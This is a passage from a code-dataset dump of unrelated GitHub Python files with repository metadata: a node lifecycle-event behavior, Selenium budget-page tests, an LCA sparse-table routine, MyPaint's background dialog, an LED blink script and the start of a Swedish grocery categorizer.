plumber import default\nfrom plumber import plumb\nfrom zope.component.event import objectEventNotify\nfrom zope.interface import implementer\nimport threading\n\n\nclass LifecycleContext(threading.local):\n suppress_events = False\n\n\n_lifecycle_context = LifecycleContext()\n\n\n@contextmanager\ndef suppress_lifecycle_events():\n \"\"\"Context manager to suppress lifecycle events.\"\"\"\n _lifecycle_context.suppress_events = True\n try:\n yield\n finally:\n _lifecycle_context.suppress_events = False\n\n\n@implementer(ILifecycle)\nclass Lifecycle(Behavior):\n\n events = default({\n 'created': NodeCreatedEvent,\n 'added': NodeAddedEvent,\n 'modified': NodeModifiedEvent,\n 'removed': NodeRemovedEvent,\n 'detached': NodeDetachedEvent,\n })\n\n @plumb\n def __init__(next_, self, *args, **kw):\n next_(self, *args, **kw)\n objectEventNotify(self.events['created'](self))\n\n @plumb\n def __setitem__(next_, self, key, val):\n next_(self, key, val)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.events['added'](\n val,\n newParent=self,\n newName=key\n ))\n\n @plumb\n def __delitem__(next_, self, key):\n delnode = self[key]\n next_(self, key)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.events['removed'](\n delnode,\n oldParent=self,\n oldName=key\n ))\n\n @plumb\n def detach(next_, self, key):\n with suppress_lifecycle_events():\n node = next_(self, key)\n objectEventNotify(self.events['detached'](\n node,\n oldParent=self,\n oldName=key\n ))\n return node\n\n\n@implementer(IAttributesLifecycle)\nclass AttributesLifecycle(Behavior):\n\n @plumb\n def __setitem__(next_, self, key, val):\n next_(self, key, val)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.__parent__.events['modified'](self.__parent__))\n\n @plumb\n def __delitem__(next_, self, key):\n next_(self, key)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.__parent__.events['modified'](self.__parent__))\n","repo_name":"conestack/node","sub_path":"src/node/behaviors/lifecycle.py","file_name":"lifecycle.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"12551246059","text":"import time\nfrom base.selenium_driver import SeleniumDriver\nfrom pages.add_remove_product.add_remove_product_page import addRemoveProducts\n\n\nclass FurnitureBudget(SeleniumDriver):\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n # project_card\n # Locators\n\n '''\n listing pages Getting budget values\n \n '''\n\n # Project name\n _title_name = \"//p[contains(text(),'Hareza Ikebukuro - P1')]\"\n _click_first_project = \"//p[contains(text(),'Avenida Circunvalacion del Club Golf Los Incas 170')]\"\n _bar = \"//div[1]/div[4]/div[1]/span[1]\"\n\n # pagination next\n _next = \"//li[contains(text(),'Next')]\"\n\n # pagination count\n _total_count = \"/html[1]/body[1]/div[1]/div[1]/div[4]/div[1]/div[1]/div[1]/div[2]/ul[1]/li[8]\"\n\n # title name\n _element_name = \"//p[contains(text(),'Central Plaza - P1')]\"\n\n # edit address link on detail page\n edit_address = \"//a[@class='budget-card-edit__anchor']\"\n\n # edit address text\n element = \"//p[contains(text(),'Furniture budget')]\"\n\n # add budget\n _budget_field = \"//input[@placeholder='$0.00']\"\n\n # save button\n _save_button = \"//span[contains(text(),'Save')]\"\n\n # values of budget, subtotal\n _subtotal = \"//div[@id='project-page-header-container']//div[3]//div[4]//p[2]\"\n _budget = \"//div[@id='project-page-header-container']//div[3]//div[3]//p[2]\"\n _budget_met = \"//div[@id='project-page-header-container']//div[3]//div[2]\"\n _add_budget_button = \"//a[@class='budget-card-add']\"\n _home_menu = \"//span[contains(.,'Home')]\"\n\n\n '''\n \n 1. Login to web app\n 2. Click on any product\n --- Check budget link available or not\n if available - click on budget link\n \n \n '''\n\n\n # Check if budget link is available then click on budget link else return to function.\n\n def addBudget(self):\n time.sleep(3)\n if self.isElementPresent(self._add_budget_button) == True:\n self.elementClick(self._add_budget_button)\n self.EnterBudget('11024.60')\n self.clickSaveButton()\n else:\n return\n\n # Enter Budget value using add budget link\n\n def enterBudget(self):\n time.sleep(2)\n self.waitForElement(self._click_first_project)\n self.elementClick(self._click_first_project)\n time.sleep(2)\n\n if self.isElementPresent(self._add_budget_button) == True:\n self.elementClick(self._add_budget_button)\n self.EnterBudget('11024.60')\n self.clickSaveButton()\n else:\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget('0')\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(2)\n self.addBudget()\n\n # Enter negative value and verify it does not take it.\n\n def enterNegativeValue(self):\n time.sleep(3)\n if self.isElementPresent(self._add_budget_button) == True:\n self.log.info('negative value --add budget button available')\n self.elementClick(self._add_budget_button)\n self.EnterBudget('11024.60')\n self.clickSaveButton()\n else:\n self.log.info('negative value enter')\n self.addEditBudget()\n time.sleep(2)\n value = '-123'\n self.EnterBudget(value)\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(2)\n neg_value = self.getText(self._budget)\n self.log.info(neg_value)\n self.log.info('negative value enter')\n if neg_value != value:\n return True\n else:\n return False\n\n # Edit budget function\n def addEditBudget(self):\n time.sleep(2)\n self.elementClick(self.element)\n time.sleep(2)\n self.elementClick(self.edit_address)\n time.sleep(2)\n\n # Enter budget function\n def EnterBudget(self, value):\n time.sleep(2)\n self.clearField(self._budget_field)\n time.sleep(2)\n self.sendKeys(value, self._budget_field)\n\n # save button function to save entered budget\n def clickSaveButton(self):\n self.elementClick(self._save_button)\n\n # Budget met def to calculate budget met or not.\n def budgetMet(self):\n self.addBudget()\n time.sleep(2)\n subtotal = self.getText(self._subtotal)\n self.ad = addRemoveProducts(self.driver)\n if subtotal == '-':\n self.ad.addRoomAssignment()\n subtotal = self.getText(self._subtotal)\n subtotal = subtotal.replace('$', '')\n time.sleep(2)\n self.webScroll(direction='up')\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget(subtotal)\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(5)\n t = self.getText(self._budget_met)\n self.verifyTextContains(actualText=t, expectedText='Budget met!')\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(5)\n bar_text = self.getText(self._bar)\n time.sleep(2)\n self.verifyTextContains(actualText=t, expectedText=bar_text)\n\n def budgetOver(self):\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.addBudget()\n time.sleep(2)\n budget = self.getText(self._budget)\n time.sleep(2)\n budget = budget.replace('$', '')\n budget = budget.replace(',', '')\n subtotal = self.getText(self._subtotal)\n subtotal = subtotal.replace('$', '')\n subtotal = subtotal.replace(',', '')\n if budget < subtotal:\n calculate = str(float(subtotal) - float(budget))\n budget = str(float(budget) - float(calculate))\n elif budget > subtotal:\n calculate = str(float(budget) - float(subtotal))\n value = float(5)\n calculate = str(float(calculate) + float(value))\n budget = str(float(budget) - float(calculate))\n elif budget == subtotal:\n value = float(5)\n budget = str(float(budget) - float(value))\n\n time.sleep(2)\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget(str(budget))\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(3)\n trim1 = self.getText(self._budget_met)\n trim1 = trim1.split()\n trim1 = trim1[1]\n self.verifyTextContains(actualText=trim1, expectedText=\"over\")\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(4)\n bar_text = self.getText(self._bar)\n time.sleep(2)\n self.verifyTextContains(actualText=bar_text, expectedText='$5.00 over')\n\n def budgetUnder(self):\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.addBudget()\n time.sleep(2)\n budget = self.getText(self._budget)\n time.sleep(2)\n budget = budget.replace('$', '')\n budget = budget.replace(',', '')\n subtotal = self.getText(self._subtotal)\n subtotal = subtotal.replace('$', '')\n subtotal = subtotal.replace(',', '')\n if budget < subtotal:\n calculate = str(float(subtotal) - float(budget))\n value = float(5)\n calculate = str(float(calculate) + float(value))\n budget = str(float(budget) + float(calculate))\n elif budget > subtotal:\n calculate = str(float(budget) - float(subtotal))\n budget = str(float(budget) + float(calculate))\n elif budget == subtotal:\n value = float(5)\n budget = str(float(budget) + float(value))\n\n time.sleep(2)\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget(str(budget))\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(3)\n trim1 = self.getText(self._budget_met)\n trim1 = trim1.split()\n trim1 = trim1[1]\n self.verifyTextContains(actualText=trim1, expectedText=\"under\")\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(4)\n bar_text = self.getText(self._bar)\n time.sleep(2)\n self.verifyTextContains(actualText=bar_text, expectedText='$5.00 under')\n\n\n # locators:\n _close_project_details = \"//span[contains(text(),'Close project details')]\"\n _expand_project_details = \"//span[contains(text(),'Expand project details')]\"\n\n # Click on project link to minimise it.\n def closeProjectLink(self):\n time.sleep(2)\n self.elementClick(self._click_first_project)\n time.sleep(5)\n self.elementClick(self._close_project_details)\n time.sleep(2)\n value = \"Expand project details\"\n get_value = self.getText(self._expand_project_details)\n time.sleep(2)\n self.verifyTextContains(actualText=get_value, expectedText=value)\n\n # Click on project link to maximise it.\n def expandProjectLink(self):\n time.sleep(5)\n self.elementClick(self._expand_project_details)\n time.sleep(2)\n value = \"Close project details\"\n get_value = self.getText(self._close_project_details)\n time.sleep(2)\n self.verifyTextContains(actualText=get_value, expectedText=value)\n\n # locators:\n\n _button_status = \"//div[@id='project-page-header-container']/div[1]\"\n _outer_button_status = '''//*[@id=\"root\"]/div/div[3]/div/div/div[1]/div[1]/div[1]/div[1]'''\n _first_notstarted = \"//div[@id='project-page-header-container']/div[2]/div/div[2]/p\"\n _second_inprogress = \"//div[@id='project-page-header-container']/div[2]/div/div[1]/p\"\n _third_done = \"//div[@id='project-page-header-container']/div[2]/div/div[3]/p\"\n _fourth_blocked = \"//div[@id='project-page-header-container']/div[2]/div/div[4]/p\"\n\n '''def projectStage(self):\n time.sleep(2)\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._third_done)\n time.sleep(5)\n a = self.getText(self._button_status)\n time.sleep(5)\n self.elementClick(self._home_menu)\n time.sleep(2)\n b = self.getText(self._outer_button_status)\n self.verifyTextContains(actualText=a, expectedText=b)\n\n def projectStatus1(self):\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._second_inprogress)\n time.sleep(3)\n aa = self.getText(self._button_status)\n time.sleep(3)\n self.elementClick(self._home_menu)\n time.sleep(5)\n outer_button_status = self.getText(self._outer_button_status)\n time.sleep(2)\n self.verifyTextContains(actualText=aa, expectedText=outer_button_status)\n\n def projectStatus2(self):\n self.elementClick(self._click_first_project)\n time.sleep(3)\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._fourth_blocked)\n time.sleep(3)\n text = self.getText(self._button_status)\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(5)\n obs = self.getText(self._outer_button_status)\n self.verifyTextContains(actualText=text, expectedText=obs)\n\n def projectStatus3(self):\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._first_notstarted)\n time.sleep(2)\n aaa = self.getText(self._button_status)\n time.sleep(5)\n self.elementClick(self._home_menu)\n time.sleep(5)\n bbb = self.getText(self._outer_button_status)\n self.verifyTextContains(actualText=aaa, expectedText=bbb)'''\n\n # LOCATORS\n\n # stargate link on detail page\n _stargate_link_detail_page = \"//span[@class='stargate']\"\n\n # stargate page logo\n _stargate_site_logo = \"//img[@id='login-logo']\"\n\n # Click on stargate link to verify link navigation and check navigation is going correct.\n\n\n def clickStargateLink(self):\n time.sleep(2)\n self.waitForElement(self._click_first_project)\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.waitForElement(self._stargate_link_detail_page)\n window_before = self.driver.window_handles[0]\n self.elementClick(self._stargate_link_detail_page)\n window_after = self.driver.window_handles[1]\n\n # switch on to new child window\n self.driver.switch_to.window(window_after)\n self.isElementDisplayed(self._stargate_site_logo)\n return True\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dynamicsagar/furnish","sub_path":"pages/furniture_budget/furniture_budget_pages.py","file_name":"furniture_budget_pages.py","file_ext":"py","file_size_in_byte":12603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18948063368","text":"# N: 頂点数\n# G[v]: 頂点vの子頂点 (親頂点は含まない)\nN = ...\nG = [[...] for i in range(N)]\n\n# Euler Tour Technique\nS = []\nF = [0]*N\ndepth = [0]*N\ndef dfs(v, d):\n F[v] = len(S)\n depth[v] = d\n S.append(v)\n for w in G[v]:\n dfs(w, d+1)\n S.append(v)\ndfs(0, 0)\n\n# Disjoint Sparse Tableの構築\nINF = (N, None)\n \nLV = (2*N-1).bit_length()\nN0 = 2**LV\ntable = [[None]*N0 for i in range(LV)]\n \nS0 = [INF]*N0\nfor i, v in enumerate(S):\n S0[i] = (depth[v], v)\n \nsz = N0; hf = N0 >> 1\nfor k in range(LV):\n table_k = table[k]\n for i in range(hf, N0, sz):\n table_k[i-1] = r = S0[i-1]\n for j in range(i-2, i-hf-1, -1):\n table_k[j] = r = min(S0[j], r)\n \n table_k[i] = r = S0[i]\n for j in range(i+1, i+hf):\n table_k[j] = r = min(S0[j], r)\n sz >>= 1; hf >>= 1\n \n# LCAの計算\ndef query(u, v):\n if u == v:\n return u\n fu = F[u]; fv = F[v]\n if fu > fv:\n fu, fv = fv, fu\n \n k2 = (fu ^ fv).bit_length()\n table_l = table[LV - k2]\n ans = table_l[fu]\n if fv & ((1 << k2) - 1):\n ans = min(ans, table_l[fv])\n return ans[1]","repo_name":"tjkendev/procon-library","sub_path":"python/graph/lca-dst.py","file_name":"lca-dst.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"36243036318","text":"# import sys\n\n# try:\n# \tf = open('text.txt')\n# \ts = f.readline()\n# \tprint(s)\n# \ti = int(s.strip())\n# except OSError as err:\n# \tprint(\"OS error: {0}\".format(err))\n# except ValueError:\n# \tprint(\"Could not data into integer.\")\n# except:\n# \tprint(\"Unexpected error: \", sys.exc_info()[0])\n# \traise\n\nwith open('text.txt') as f:\n\tfile_data = f.read()\n\tprint(file_data)\n\nf.close()","repo_name":"bmwasaru/class","sub_path":"file_read.py","file_name":"file_read.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14921464239","text":"from __future__ import division, print_function\nimport os\nimport sys\nimport logging\n\nfrom gettext import gettext as _\nfrom lib.gibindings import Gtk\nfrom lib.gibindings import GdkPixbuf\n\nfrom . import pixbuflist\nfrom . import windowing\nfrom lib import tiledsurface\nfrom lib import helpers\nimport lib.pixbuf\nfrom lib.pycompat import unicode\nfrom lib.pycompat import xrange\n\nlogger = logging.getLogger(__name__)\n\n## Settings and consts\n\nN = tiledsurface.N\nDEFAULT_BACKGROUND = 'default.png'\nFALLBACK_BACKGROUND = 'mrmamurk/mamurk_e_1.png'\nBACKGROUNDS_SUBDIR = 'backgrounds'\nRESPONSE_SAVE_AS_DEFAULT = 1\nBLOAT_MAX_SIZE = 1024\n\n\n## Class defs\n\nclass BackgroundWindow (windowing.Dialog):\n\n def __init__(self):\n from gui import application\n app = application.get_app()\n assert app is not None\n\n windowing.Dialog.__init__(\n self,\n app=app,\n title=_('Background'),\n modal=True\n )\n self.add_button(_('Save as Default'), RESPONSE_SAVE_AS_DEFAULT)\n self.add_button(Gtk.STOCK_OK, Gtk.ResponseType.ACCEPT)\n\n self._current_background_pixbuf = None # set when changed\n\n # Set up window.\n self.connect('response', self._response_cb)\n\n notebook = self.nb = Gtk.Notebook()\n self.vbox.pack_start(notebook, True, True, 0)\n\n # Set up patterns tab.\n patterns_scroll = Gtk.ScrolledWindow()\n patterns_scroll.set_policy(\n Gtk.PolicyType.NEVER,\n Gtk.PolicyType.AUTOMATIC,\n )\n notebook.append_page(patterns_scroll, Gtk.Label(label=_('Pattern')))\n\n self.bgl = BackgroundList(self)\n patterns_scroll.add(self.bgl)\n\n self.connect(\"realize\", self._realize_cb)\n self.connect(\"show\", self._show_cb)\n self.connect(\"hide\", self._hide_cb)\n\n # Set up colors tab.\n color_vbox = Gtk.VBox()\n notebook.append_page(color_vbox, Gtk.Label(label=_('Color')))\n\n self.cs = Gtk.ColorSelection()\n self.cs.connect('color-changed', self._color_changed_cb)\n color_vbox.pack_start(self.cs, True, True, 0)\n\n b = Gtk.Button(label=_('Add color to Patterns'))\n b.connect('clicked', self._add_color_to_patterns_cb)\n color_vbox.pack_start(b, False, True, 0)\n\n def _realize_cb(self, dialog):\n if not self.bgl.initialized:\n self.bgl.initialize()\n\n def _show_cb(self, dialog):\n self._current_background_pixbuf = None\n self.set_response_sensitive(RESPONSE_SAVE_AS_DEFAULT, False)\n\n def _hide_cb(self, dialog):\n self._current_background_pixbuf = None\n\n def _response_cb(self, dialog, response, *args):\n if response == RESPONSE_SAVE_AS_DEFAULT:\n self._save_as_default_cb()\n elif response == Gtk.ResponseType.ACCEPT:\n self.hide()\n\n def _color_changed_cb(self, widget):\n pixbuf = self._get_selected_color_pixbuf()\n self.set_background(pixbuf)\n\n def _get_selected_color_pixbuf(self):\n rgb = self.cs.get_current_color()\n rgb = (rgb.red, rgb.green, rgb.blue)\n rgb = (c / 0xffff for c in rgb)\n pixbuf = new_blank_pixbuf(rgb, N, N)\n return pixbuf\n\n def _save_as_default_cb(self):\n pixbuf = self._current_background_pixbuf\n assert pixbuf is not None, \"BG pixbuf was not changed.\"\n path = os.path.join(\n self.app.user_datapath,\n BACKGROUNDS_SUBDIR,\n DEFAULT_BACKGROUND,\n )\n lib.pixbuf.save(pixbuf, path, 'png')\n self.hide()\n\n def set_background(self, pixbuf):\n doc = self.app.doc.model\n doc.layer_stack.set_background(pixbuf, make_default=True)\n self._current_background_pixbuf = pixbuf\n self.set_response_sensitive(RESPONSE_SAVE_AS_DEFAULT, True)\n\n def _add_color_to_patterns_cb(self, widget):\n pixbuf = self._get_selected_color_pixbuf()\n i = 1\n while True:\n filename = os.path.join(self.app.user_datapath,\n BACKGROUNDS_SUBDIR,\n 'color%02d.png' % i)\n if not os.path.exists(filename):\n break\n i += 1\n lib.pixbuf.save(pixbuf, filename, 'png')\n self.bgl.backgrounds.append(pixbuf)\n self.bgl.update()\n self.bgl.set_selected(pixbuf)\n self.nb.set_current_page(0)\n\n\nclass BackgroundList (pixbuflist.PixbufList):\n\n _SUFFIXES = ('.jpg', '.jpeg', '.png')\n\n def __init__(self, win):\n pixbuflist.PixbufList.__init__(\n self,\n None,\n N, N,\n namefunc=self._get_tooltip,\n pixbuffunc=self._get_preview_pixbuf,\n )\n self.app = win.app\n self.win = win\n\n stock_path = os.path.join(self.app.datapath, BACKGROUNDS_SUBDIR)\n user_path = os.path.join(self.app.user_datapath, BACKGROUNDS_SUBDIR)\n if not os.path.isdir(user_path):\n os.mkdir(user_path)\n\n self._background_files = self._list_dir(stock_path)\n self._background_files.sort()\n self._background_files += self._list_dir(user_path)\n\n # Exclude DEFAULT_BACKGROUND from the list shown to the user\n for filename in reversed(self._background_files):\n file_basename = os.path.basename(filename)\n if file_basename.lower() == DEFAULT_BACKGROUND:\n self._background_files.remove(filename)\n\n self._pixbuf_tooltip = {}\n self._pixbufs_scaled = {} # lazily loaded by self.initialize()\n self.backgrounds = []\n\n self.item_selected += self._item_selected_cb\n\n @classmethod\n def _list_dir(cls, path):\n \"\"\"Recursively find images by suffix\"\"\"\n contents = []\n for dir_path, dir_subdirs, dir_files in os.walk(path):\n for file_name in dir_files:\n is_matched = False\n file_name_lowercase = file_name.lower()\n for suffix in cls._SUFFIXES:\n if not file_name_lowercase.endswith(suffix):\n continue\n is_matched = True\n break\n if is_matched:\n file_path = os.path.join(dir_path, file_name)\n contents.append(file_path)\n contents.sort(key=os.path.getmtime)\n return contents\n\n @property\n def initialized(self):\n return len(self.backgrounds) != 0\n\n def initialize(self):\n self.backgrounds = self._load_pixbufs(self._background_files)\n self.set_itemlist(self.backgrounds)\n\n def _load_pixbufs(self, files, exclude_default=False):\n pixbufs = []\n load_errors = []\n for filename in files:\n is_matched = False\n for suffix in self._SUFFIXES:\n if not filename.lower().endswith(suffix):\n continue\n is_matched = True\n break\n if not is_matched:\n logger.warning(\n \"Excluding %r: not in %r\",\n filename,\n self._SUFFIXES,\n )\n continue\n pixbuf, errors = load_background(filename)\n if errors:\n for err in errors:\n logger.error(\"Error loading %r: %r\", filename, err)\n load_errors.append(err)\n continue\n if os.path.basename(filename).lower() == DEFAULT_BACKGROUND:\n if exclude_default:\n logger.warning(\"Excluding %r: is default background (%r)\",\n filename, DEFAULT_BACKGROUND)\n continue\n pixbufs.append(pixbuf)\n tooltip = _filename_to_display(filename)\n self._pixbuf_tooltip[pixbuf] = tooltip\n\n if load_errors:\n msg = \"\\n\\n\".join(load_errors)\n self.app.message_dialog(\n text=_(\"One or more backgrounds could not be loaded\"),\n title=_(\"Error loading backgrounds\"),\n secondary_text=_(\"Please remove the unloadable files, or \"\n \"check your libgdkpixbuf installation.\"),\n long_text=msg,\n message_type=Gtk.MessageType.WARNING,\n modal=True,\n )\n\n logger.info(\"Loaded %d of %d background(s), with %d error(s)\",\n len(pixbufs), len(files), len(errors))\n return pixbufs\n\n def _get_preview_pixbuf(self, pixbuf):\n if pixbuf in self._pixbufs_scaled:\n return self._pixbufs_scaled[pixbuf]\n w, h = pixbuf.get_width(), pixbuf.get_height()\n if w == N and h == N:\n return pixbuf\n assert w >= N\n assert h >= N\n scale = max(0.25, N / min(w, h))\n scaled = new_blank_pixbuf((0, 0, 0), N, N)\n pixbuf.composite(\n dest=scaled,\n dest_x=0, dest_y=0,\n dest_width=N, dest_height=N,\n offset_x=0, offset_y=0,\n scale_x=scale, scale_y=scale,\n interp_type=GdkPixbuf.InterpType.BILINEAR,\n overall_alpha=255,\n )\n self.app.pixmaps.plus.composite(\n dest=scaled,\n dest_x=0, dest_y=0,\n dest_width=N, dest_height=N,\n offset_x=0, offset_y=0,\n scale_x=1.0, scale_y=1.0,\n interp_type=GdkPixbuf.InterpType.BILINEAR,\n overall_alpha=255,\n )\n self._pixbufs_scaled[pixbuf] = scaled\n return scaled\n\n def _get_tooltip(self, pixbuf):\n return self._pixbuf_tooltip.get(pixbuf, None)\n\n def _item_selected_cb(self, self_, pixbuf):\n self.win.set_background(pixbuf)\n\n\n## Helpers\n\n\ndef _filename_to_display(s):\n \"\"\"Convert a str filename to Unicode without obsessing too much.\"\"\"\n # That said, try to be be correct about Windows/POSIX weirdness.\n if not isinstance(s, unicode):\n if sys.platform == \"win32\":\n enc = \"UTF-8\" # always, and sys.getfilesystemencoding() breaks\n else:\n enc = sys.getfilesystemencoding()\n s = s.decode(enc, \"replace\")\n return s\n\n\ndef new_blank_pixbuf(rgb, w, h):\n \"\"\"Create a blank pixbuf with all pixels set to a color\n\n :param tuple rgb: Color to blank the pixbuf to (``R,G,B``, floats)\n :param int w: Width for the new pixbuf\n :param int h: Width for the new pixbuf\n\n The returned pixbuf has no alpha channel.\n\n \"\"\"\n pixbuf = GdkPixbuf.Pixbuf.new(\n GdkPixbuf.Colorspace.RGB, False, 8,\n w, h,\n )\n r, g, b = (helpers.clamp(int(round(0xff * x)), 0, 0xff) for x in rgb)\n rgba_pixel = (r << 24) + (g << 16) + (b << 8) + 0xff\n pixbuf.fill(rgba_pixel)\n return pixbuf\n\n\ndef load_background(filename, bloatmax=BLOAT_MAX_SIZE):\n \"\"\"Load a pixbuf, testing it for suitability as a background\n\n :param str filename: Full path to the filename to load.\n :param int bloatmax: Repeat up to this size\n :rtype: tuple\n\n The returned tuple is a pair ``(PIXBUF, ERRORS)``,\n where ``ERRORS`` is a list of localized strings\n describing the errors encountered,\n and ``PIXBUF`` contains the loaded background pixbuf.\n If there were errors, ``PIXBUF`` is None.\n\n The MyPaint rendering engine can only manage\n background layers which fit into its tile structure.\n Formerly, only background images with dimensions\n which were exact multiples of the tile size were permitted.\n We have a couple of workarounds now:\n\n * \"Bloating\" the background by repetition (pixel-perfect)\n * Scaling the image down to fit (distorts the image)\n\n \"\"\"\n filename_display = _filename_to_display(filename)\n load_errors = []\n try:\n pixbuf = GdkPixbuf.Pixbuf.new_from_file(filename)\n except Exception as ex:\n logger.error(\"Failed to load background %r: %s\", filename, ex)\n msg = unicode(_(\n 'Gdk-Pixbuf couldn\\'t load \"{filename}\", and reported \"{error}\"'\n ))\n load_errors.append(msg.format(\n filename=filename_display,\n error=repr(ex),\n ))\n return (None, load_errors)\n # Validity check\n w, h = pixbuf.get_width(), pixbuf.get_height()\n if w == 0 or h == 0:\n msg = unicode(_(\"{filename} has zero size (w={w}, h={h})\"))\n load_errors.append(msg.format(\n filename=filename_display,\n w=w, h=h,\n ))\n return (None, load_errors)\n # Flatten\n if pixbuf.get_has_alpha():\n logger.warning(\n \"%r has an alpha channel, which should be removed manually\",\n filename,\n )\n new_pixbuf = new_blank_pixbuf((0, 0, 0), w, h)\n pixbuf.composite(\n dest=new_pixbuf,\n dest_x=0, dest_y=0,\n dest_width=w, dest_height=h,\n offset_x=0, offset_y=0,\n scale_x=1.0, scale_y=1.0,\n interp_type=GdkPixbuf.InterpType.NEAREST,\n overall_alpha=255,\n )\n pixbuf = new_pixbuf\n logger.debug(\n \"Flattened %s by compositing it onto a black backdrop\",\n filename,\n )\n # Attempt to fit the image into our grid.\n exact_fit = ((w % N, h % N) == (0, 0))\n if not exact_fit:\n logger.warning(\n \"%r (%dx%d) does not fit the %dx%d tile grid exactly\",\n filename,\n w, h,\n N, N,\n )\n repeats_x = _best_nrepeats_for_scaling(w, bloatmax)\n repeats_y = _best_nrepeats_for_scaling(h, bloatmax)\n if repeats_x > 1 or repeats_y > 1:\n logger.info(\n \"Tiling %r to %dx%d (was: %dx%d, repeats: %d vert, %d horiz)\",\n filename,\n w * repeats_x, h * repeats_y,\n w, h,\n repeats_x, repeats_y,\n )\n pixbuf = _tile_pixbuf(pixbuf, repeats_x, repeats_y)\n w, h = pixbuf.get_width(), pixbuf.get_height()\n if (w % N != 0) or (h % N != 0):\n orig_w, orig_h = w, h\n w = max(1, w // N) * N\n h = max(1, h // N) * N\n logger.info(\n \"Scaling %r to %dx%d (was: %dx%d)\",\n filename,\n w, h,\n orig_w, orig_h,\n )\n pixbuf = pixbuf.scale_simple(\n dest_width=w, dest_height=h,\n interp_type=GdkPixbuf.InterpType.BILINEAR,\n )\n assert (w % N == 0) and (h % N == 0)\n if load_errors:\n pixbuf = None\n return pixbuf, load_errors\n\n\ndef _tile_pixbuf(pixbuf, repeats_x, repeats_y):\n \"\"\"Make a repeated tiled image of a pixbuf\"\"\"\n w, h = pixbuf.get_width(), pixbuf.get_height()\n result = new_blank_pixbuf((0, 0, 0), repeats_x * w, repeats_y * h)\n for xi in xrange(repeats_x):\n for yi in xrange(repeats_y):\n pixbuf.copy_area(0, 0, w, h, result, w * xi, h * yi)\n return result\n\n\ndef _best_nrepeats_for_scaling(src_size, max_dest_size):\n min_remainder = N\n min_remainder_nrepeats = 1\n nrepeats = 0\n dest_size = 0\n while dest_size <= max_dest_size:\n nrepeats += 1\n dest_size += src_size\n remainder = dest_size % N\n if remainder < min_remainder:\n min_remainder_nrepeats = nrepeats\n min_remainder = remainder\n if remainder == 0:\n break\n return min_remainder_nrepeats\n","repo_name":"mypaint/mypaint","sub_path":"gui/backgroundwindow.py","file_name":"backgroundwindow.py","file_ext":"py","file_size_in_byte":15394,"program_lang":"python","lang":"en","doc_type":"code","stars":2400,"dataset":"github-code","pt":"76"} +{"seq_id":"42549779047","text":"#!/usr/bin/env python\n\"\"\"\nDescription : Blink an LED\nAuthor : Russell\nE-mail : russellshome@gmail.com\nDate : 2020/08/26\nCircuit : https://crcit.net/c/98db0b1c4bcc420fbb3f02dd2a52553a\n\"\"\"\nfrom gpiozero import LED\nfrom time import sleep\nprint(__doc__)\nled = LED(17)\nwhile True:\n led.on()\n sleep(1)\n led.off()\n sleep(1)","repo_name":"russellshome/python","sub_path":"gpiozero/blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31763242129","text":"from enum import Enum\n\n# Description of each ItemCategory.\ncategoryDescription = {\n \"UNKNOWN\": \"Övrigt\",\n \"GREEN\": \"Grönt\",\n \"DAIRY\": \"Mjölk/ost\",\n \"BREAD\": \"Bröd\",\n \"MEAT\": \"Kött/fisk\",\n \"BASIC\": \"Basvaror\",\n \"CARBS\": \"kolhydrater\",\n}\n# Keywords to search for when categorizing.\ncategoryKeywords = {\n \"GREEN\": [\n \"lök\",\n \"paprika\",\n \"gurka\",\n \"tomat\",\n \"sallad\",\n \"potatis\",\n \"zucchini\",\n \"frukt\",\n \"äppel\",\n \"apelsin\",\n \"aubergine\",\n \"ananas\",\n \"basilika\",\n \"koriander\",\n \"broccoli\",\n \"pumpa\",\n \"nötter\",\n \"citron\",\n \"äpple\",\n \"dill\",\n \"timjan\",\n \"tranbär\",\n \"kål\",\n \"bönor\",\n \"frön\",\n \"salvia\",\n \"linser\",\n \"spenat\",\n \"rosmarin\",\n \"svamp\",\n \"champinjon\",\n \"lime\",\n \"morot\",\n \"kikärt\",\n \"morötter\",\n \"persilja\",\n \"melon\",\n \"portabello\",\n \"oregano\",\n \"päron\",\n \"rucola\",\n \"dragon\",\n \"selleri\",\n \"rädisor\",\n \"majs\",\n \"mynta\",\n \"ingefära\",\n \"mango\",\n \"portabello\",\n \"avokado\",\n \"chili\",\n \"rödbet\",\n \"palsternack\",\n ],\n \"BREAD\": [\"bröd\", \"baguette\", \"ciabatta\", 